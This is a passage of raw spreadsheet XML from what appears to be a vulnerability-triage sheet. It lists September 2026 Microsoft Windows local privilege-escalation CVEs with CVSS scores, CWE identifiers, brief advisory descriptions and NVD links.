r="J485" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K48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85" s="5" t="inlineStr" /><c r="M485" s="5" t="inlineStr" /><c r="N485" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O485" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P485" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q485" s="5" t="inlineStr" /><c r="R485" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S485" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T485" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t></is></c></row><row r="486"><c r="A486" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B486" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C486" s="5" t="inlineStr"><is><t>CVE-2026-69277</t></is></c><c r="D486" s="5" t="n"><v>7.8</v></c><c r="E486" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F486" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G486" s="5" t="inlineStr" /><c r="H486" s="5" t="n"><v>0.003</v></c><c r="I486" s="5" t="inlineStr" /><c r="J486" s="5" t="inlineStr" /><c r="K486" s="5" t="inlineStr" /><c r="L486" s="5" t="inlineStr" /><c r="M486" s="5" t="inlineStr" /><c r="N486" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O486" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P486" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q486" s="5" t="inlineStr" /><c r="R486" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S486" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T486" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69277</t></is></c></row><row r="487"><c r="A487" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B487" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C487" s="5" t="inlineStr"><is><t>CVE-2026-69283</t></is></c><c r="D487" s="5" t="n"><v>7.8</v></c><c r="E487" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F487" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G487" s="5" t="inlineStr" /><c r="H487" s="5" t="n"><v>0.002</v></c><c r="I487" s="5" t="inlineStr" /><c r="J487" s="5" t="inlineStr" /><c r="K487" s="5" t="inlineStr" /><c r="L487" s="5" t="inlineStr" /><c r="M487" s="5" t="inlineStr" /><c r="N487" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O487" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P487" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q487" s="5" t="inlineStr" /><c r="R487" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S487" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T487" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69283</t></is></c></row><row r="488"><c r="A488" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B488" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C488" s="5" t="inlineStr"><is><t>CVE-2026-69284</t></is></c><c r="D488" s="5" t="n"><v>7.8</v></c><c r="E488" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F488" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G488" s="5" t="inlineStr" /><c r="H488" s="5" t="n"><v>0.002</v></c><c r="I488" s="5" t="inlineStr" /><c r="J488" s="5" t="inlineStr" /><c r="K488" s="5" t="inlineStr" /><c r="L488" s="5" t="inlineStr" /><c r="M488" s="5" t="inlineStr" /><c r="N488" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O488" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P488" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q488" s="5" t="inlineStr" /><c r="R488" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S488" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DCOM Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T488" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69284</t></is></c></row><row r="489"><c r="A489" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B489" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C489" s="5" t="inlineStr"><is><t>CVE-2026-69289</t></is></c><c r="D489" s="5" t="n"><v>7.8</v></c><c r="E489" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F489" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G489" s="5" t="inlineStr" /><c r="H489" s="5" t="n"><v>0.004</v></c><c r="I489" s="5" t="inlineStr" /><c r="J489" s="5" t="inlineStr" /><c r="K489" s="5" t="inlineStr" /><c r="L489" s="5" t="inlineStr" /><c r="M489" s="5" t="inlineStr" /><c r="N489" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O489" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P489" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q489" s="5" t="inlineStr" /><c r="R489" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S489" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Setup Files Cleanup allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T489" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69289</t></is></c></row><row r="490"><c r="A490" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B490" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C490" s="5" t="inlineStr"><is><t>CVE-2026-69290</t></is></c><c r="D490" s="5" t="n"><v>7.8</v></c><c r="E490" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F490" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G490" s="5" t="inlineStr" /><c r="H490" s="5" t="n"><v>0.002</v></c><c r="I490" s="5" t="inlineStr" /><c r="J490" s="5" t="inlineStr" /><c r="K490" s="5" t="inlineStr" /><c r="L490" s="5" t="inlineStr" /><c r="M490" s="5" t="inlineStr" /><c r="N490" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O490" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P490" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q490" s="5" t="inlineStr" /><c r="R490" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S490" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T490" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69290</t></is></c></row><row r="491"><c r="A491" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B491" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C491" s="5" t="inlineStr"><is><t>CVE-2026-69293</t></is></c><c r="D491" s="5" t="n"><v>7.8</v></c><c r="E491" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F491" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G491" s="5" t="inlineStr" /><c r="H491" s="5" t="n"><v>0.002</v></c><c r="I491" s="5" t="inlineStr" /><c r="J491" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K49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91" s="5" t="inlineStr" /><c r="M491" s="5" t="inlineStr" /><c r="N491" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O491" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P491" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q491" s="5" t="inlineStr" /><c r="R491" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S491" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T491" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69293</t></is></c></row><row r="492"><c r="A492" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B492" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C492" s="5" t="inlineStr"><is><t>CVE-2026-69295</t></is></c><c r="D492" s="5" t="n"><v>7.8</v></c><c r="E492" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F492" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G492" s="5" t="inlineStr" /><c r="H492" s="5" t="n"><v>0.003</v></c><c r="I492" s="5" t="inlineStr" /><c r="J492" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K49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2" s="5" t="inlineStr" /><c r="M492" s="5" t="inlineStr" /><c r="N492" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O492" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P492" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q492" s="5" t="inlineStr" /><c r="R492" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S492" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T492" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t></is></c></row><row r="493"><c r="A493" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B493" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C493" s="5" t="inlineStr"><is><t>CVE-2026-69298</t></is></c><c r="D493" s="5" t="n"><v>7.8</v></c><c r="E493" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F493" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G493" s="5" t="inlineStr" /><c r="H493" s="5" t="n"><v>0.003</v></c><c r="I493" s="5" t="inlineStr" /><c r="J493" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K49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93" s="5" t="inlineStr" /><c r="M493" s="5" t="inlineStr" /><c r="N493" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O493" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P493" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q493" s="5" t="inlineStr" /><c r="R493" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S493" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T493" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69298</t></is></c></row><row r="494"><c r="A494" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B494" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C494" s="5" t="inlineStr"><is><t>CVE-2026-69307</t></is></c><c r="D494" s="5" t="n"><v>7.8</v></c><c r="E494" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F494" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G494" s="5" t="inlineStr" /><c r="H494" s="5" t="n"><v>0.003</v></c><c r="I494" s="5" t="inlineStr" /><c r="J494" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K49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4" s="5" t="inlineStr" /><c r="M494" s="5" t="inlineStr" /><c r="N494" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O494" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P494" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q494" s="5" t="inlineStr" /><c r="R494" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S494" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T494" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t></is></c></row><row r="495"><c r="A495" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B495" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C495" s="5" t="inlineStr"><is><t>CVE-2026-69312</t></is></c><c r="D495" s="5" t="n"><v>7.8</v></c><c r="E495" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F495" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G495" s="5" t="inlineStr" /><c r="H495" s="5" t="n"><v>0.003</v></c><c r="I495" s="5" t="inlineStr" /><c r="J495" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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495" s="5" t="inlineStr" /><c r="M495" s="5" t="inlineStr" /><c r="N495" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O495" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P495" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q495" s="5" t="inlineStr" /><c r="R495" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S495" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T495" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69312</t></is></c></row><row r="496"><c r="A496" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B496" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C496" s="5" t="inlineStr"><is><t>CVE-2026-69323</t></is></c><c r="D496" s="5" t="n"><v>7.8</v></c><c r="E496" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F496" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G496" s="5" t="inlineStr" /><c r="H496" s="5" t="n"><v>0.003</v></c><c r="I496" s="5" t="inlineStr" /><c r="J496" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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496" s="5" t="inlineStr" /><c r="M496" s="5" t="inlineStr" /><c r="N496" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O496" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P496" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q496" s="5" t="inlineStr" /><c r="R496" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S496" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T496" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69323</t></is></c></row><row r="497"><c r="A497" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B497" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C497" s="5" t="inlineStr"><is><t>CVE-2026-69324</t></is></c><c r="D497" s="5" t="n"><v>7.8</v></c><c r="E497" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F497" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G497" s="5" t="inlineStr" /><c r="H497" s="5" t="n"><v>0.003</v></c><c r="I497" s="5" t="inlineStr" /><c r="J497" s="5" t="inlineStr" /><c r="K497" s="5" t="inlineStr" /><c r="L497" s="5" t="inlineStr" /><c r="M497" s="5" t="inlineStr" /><c r="N497" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O497" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P497" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q497" s="5" t="inlineStr" /><c r="R497" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S497" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows Performance Monitor allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T497" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69324</t></is></c></row><row r="498"><c r="A498" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B498" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C498" s="5" t="inlineStr"><is><t>CVE-2026-69328</t></is></c><c r="D498" s="5" t="n"><v>7.8</v></c><c r="E498" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F498" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G498" s="5" t="inlineStr" /><c r="H498" s="5" t="n"><v>0.003</v></c><c r="I498" s="5" t="inlineStr" /><c r="J498" s="5" t="inlineStr" /><c r="K498" s="5" t="inlineStr" /><c r="L498" s="5" t="inlineStr" /><c r="M498" s="5" t="inlineStr" /><c r="N498" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O498" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P498" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q498" s="5" t="inlineStr" /><c r="R498" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S498" s="5" t="inlineStr"><is><t>Untrusted search path in Windows Storage allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T498" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69328</t></is></c></row><row r="499"><c r="A499" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B499" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C499" s="5" t="inlineStr"><is><t>CVE-2026-69348</t></is></c><c r="D499" s="5" t="n"><v>7.8</v></c><c r="E499" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F499" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G499" s="5" t="inlineStr" /><c r="H499" s="5" t="n"><v>0.003</v></c><c r="I499" s="5" t="inlineStr" /><c r="J499" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K499" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L499" s="5" t="inlineStr" /><c r="M499" s="5" t="inlineStr" /><c r="N499" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O499" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P499" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q499" s="5" t="inlineStr" /><c r="R499" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S499" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T499" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69348</t></is></c></row><row r="500"><c r="A500" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B500" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C500" s="5" t="inlineStr"><is><t>CVE-2026-69352</t></is></c><c r="D500" s="5" t="n"><v>7.8</v></c><c r="E500" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F500" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G500" s="5" t="inlineStr" /><c r="H500" s="5" t="n"><v>0.003</v></c><c r="I500" s="5" t="inlineStr" /><c r="J500" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K50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00" s="5" t="inlineStr" /><c r="M500" s="5" t="inlineStr" /><c r="N500" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O500" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P500" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q500" s="5" t="inlineStr" /><c r="R500" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S500" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T500" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t></is></c></row><row r="501"><c r="A501" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B501" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C501" s="5" t="inlineStr"><is><t>CVE-2026-69359</t></is></c><c r="D501" s="5" t="n"><v>7.8</v></c><c r="E501" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F501" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G501" s="5" t="inlineStr" /><c r="H501" s="5" t="n"><v>0.003</v></c><c r="I501" s="5" t="inlineStr" /><c r="J501" s="5" t="inlineStr" /><c r="K501" s="5" t="inlineStr" /><c r="L501" s="5" t="inlineStr" /><c r="M501" s="5" t="inlineStr" /><c r="N501" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O501" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P501" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q501" s="5" t="inlineStr" /><c r="R501" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S501" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Active Directory Domain Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T501" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69359</t></is></c></row><row r="502"><c r="A502" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B502" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C502" s="5" t="inlineStr"><is><t>CVE-2026-69368</t></is></c><c r="D502" s="5" t="n"><v>7.8</v></c><c r="E502" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F502" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G502" s="5" t="inlineStr" /><c r="H502" s="5" t="n"><v>0.002</v></c><c r="I502" s="5" t="inlineStr" /><c r="J502" s="5" t="inlineStr" /><c r="K502" s="5" t="inlineStr" /><c r="L502" s="5" t="inlineStr" /><c r="M502" s="5" t="inlineStr" /><c r="N502" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O502" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P502" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q502" s="5" t="inlineStr" /><c r="R502" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S502" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T502" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69368</t></is></c></row><row r="503"><c r="A503" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B503" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C503" s="5" t="inlineStr"><is><t>CVE-2026-69377</t></is></c><c r="D503" s="5" t="n"><v>7.8</v></c><c r="E503" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F503" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G503" s="5" t="inlineStr" /><c r="H503" s="5" t="n"><v>0.003</v></c><c r="I503" s="5" t="inlineStr" /><c r="J503" s="5" t="inlineStr" /><c r="K503" s="5" t="inlineStr" /><c r="L503" s="5" t="inlineStr" /><c r="M503" s="5" t="inlineStr" /><c r="N503" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O503" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P503" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q503" s="5" t="inlineStr" /><c r="R503" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S503" s="5" t="inlineStr"><is><t>Missing authorization in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T503" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69377</t></is></c></row><row r="504"><c r="A504" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B504" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C504" s="5" t="inlineStr"><is><t>CVE-2026-69389</t></is></c><c r="D504" s="5" t="n"><v>7.8</v></c><c r="E504" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F504" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G504" s="5" t="inlineStr" /><c r="H504" s="5" t="n"><v>0.003</v></c><c r="I504" s="5" t="inlineStr" /><c r="J504" s="5" t="inlineStr" /><c r="K504" s="5" t="inlineStr" /><c r="L504" s="5" t="inlineStr" /><c r="M504" s="5" t="inlineStr" /><c r="N504" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O504" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P504" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q504" s="5" t="inlineStr" /><c r="R504" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S504" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T504" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69389</t></is></c></row><row r="505"><c r="A505" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B505" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C505" s="5" t="inlineStr"><is><t>CVE-2026-69391</t></is></c><c r="D505" s="5" t="n"><v>7.8</v></c><c r="E505" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F505" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G505" s="5" t="inlineStr" /><c r="H505" s="5" t="n"><v>0.003</v></c><c r="I505" s="5" t="inlineStr" /><c r="J505" s="5" t="inlineStr" /><c r="K505" s="5" t="inlineStr" /><c r="L505" s="5" t="inlineStr" /><c r="M505" s="5" t="inlineStr" /><c r="N505" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O505" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P505" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q505" s="5" t="inlineStr" /><c r="R505" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S505" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Broker Infrastructure Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T505" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69391</t></is></c></row><row r="506"><c r="A506" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B506" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C506" s="5" t="inlineStr"><is><t>CVE-2026-69392</t></is></c><c r="D506" s="5" t="n"><v>7.8</v></c><c r="E506" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F506" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G506" s="5" t="inlineStr" /><c r="H506" s="5" t="n"><v>0.003</v></c><c r="I506" s="5" t="inlineStr" /><c r="J506" s="5" t="inlineStr" /><c r="K506" s="5" t="inlineStr" /><c r="L506" s="5" t="inlineStr" /><c r="M506" s="5" t="inlineStr" /><c r="N506" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O506" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P506" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q506" s="5" t="inlineStr" /><c r="R506" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S506" s="5" t="inlineStr"><is><t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T506" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69392</t></is></c></row><row r="507"><c r="A507" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B507" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C507" s="5" t="inlineStr"><is><t>CVE-2026-69407</t></is></c><c r="D507" s="5" t="n"><v>7.8</v></c><c r="E507" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F507" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G507" s="5" t="inlineStr" /><c r="H507" s="5" t="n"><v>0.003</v></c><c r="I507" s="5" t="inlineStr" /><c r="J507" s="5" t="inlineStr" /><c r="K507" s="5" t="inlineStr" /><c r="L507" s="5" t="inlineStr" /><c r="M507" s="5" t="inlineStr" /><c r="N507" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O507" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P507" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q507" s="5" t="inlineStr" /><c r="R507" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S507" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T507" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69407</t></is></c></row><row r="508"><c r="A508" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B508" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C508" s="5" t="inlineStr"><is><t>CVE-2026-69420</t></is></c><c r="D508" s="5" t="n"><v>7.8</v></c><c r="E508" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F508" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G508" s="5" t="inlineStr" 